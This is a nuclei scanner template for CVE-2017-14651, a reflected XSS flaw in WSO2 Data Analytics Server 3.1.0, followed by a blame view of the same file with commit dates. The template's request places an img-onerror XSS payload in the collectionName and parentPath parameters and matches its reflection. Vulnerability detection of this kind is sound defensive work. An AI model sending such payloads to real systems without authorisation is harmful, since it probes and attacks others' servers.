nuclei-templates/cves/2017/CVE-2017-14651.yaml

id: CVE-2017-14651

info:
  name: Reflected XSS - WSO2 Data Analytics Server
  author: mass0ma
  severity: medium
  description: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
  tags: cve,cve2017,wso2,xss
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.80
    cve-id: CVE-2017-14651
    cwe-id: CWE-79
  reference:
    - https://github.com/cybersecurityworks/Disclosed/issues/15
    - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265
    - https://cybersecurityworks.com/zerodays/cve-2017-14651-wso2.html

requests:
  - method: GET
    path:
      - "{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "<img src=x onerror=alert(document.domain)>"
          - "Failed to add new collection"
        part: body
        condition: and

      - type: word
        words:
          - "text/html"
        part: header
Added additional matchers 2021-08-06 14:46:35 +00:00			`id: CVE-2017-14651`

Added CVE-2017-14651 Template 2021-08-05 16:59:36 +00:00			`info:`
Added additional matchers 2021-08-06 14:46:35 +00:00			`name: Reflected XSS - WSO2 Data Analytics Server`
Added CVE-2017-14651 Template 2021-08-05 16:59:36 +00:00			`author: mass0ma`
			`severity: medium`
Added additional matchers 2021-08-06 14:46:35 +00:00			`description: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.`
			`tags: cve,cve2017,wso2,xss`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 4.80`
			`cve-id: CVE-2017-14651`
			`cwe-id: CWE-79`
			`reference:`
			`- https://github.com/cybersecurityworks/Disclosed/issues/15`
			`- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265`
			`- https://cybersecurityworks.com/zerodays/cve-2017-14651-wso2.html`
Added CVE-2017-14651 Template 2021-08-05 16:59:36 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"`

			`matchers-condition: and`
			`matchers:`

			`- type: word`
			`words:`
			`- "<img src=x onerror=alert(document.domain)>"`
Added additional matchers 2021-08-06 14:46:35 +00:00			`- "Failed to add new collection"`
Added CVE-2017-14651 Template 2021-08-05 16:59:36 +00:00			`part: body`
			`condition: and`

Added additional matchers 2021-08-06 14:46:35 +00:00			`- type: word`
			`words:`
			`- "text/html"`
			`part: header`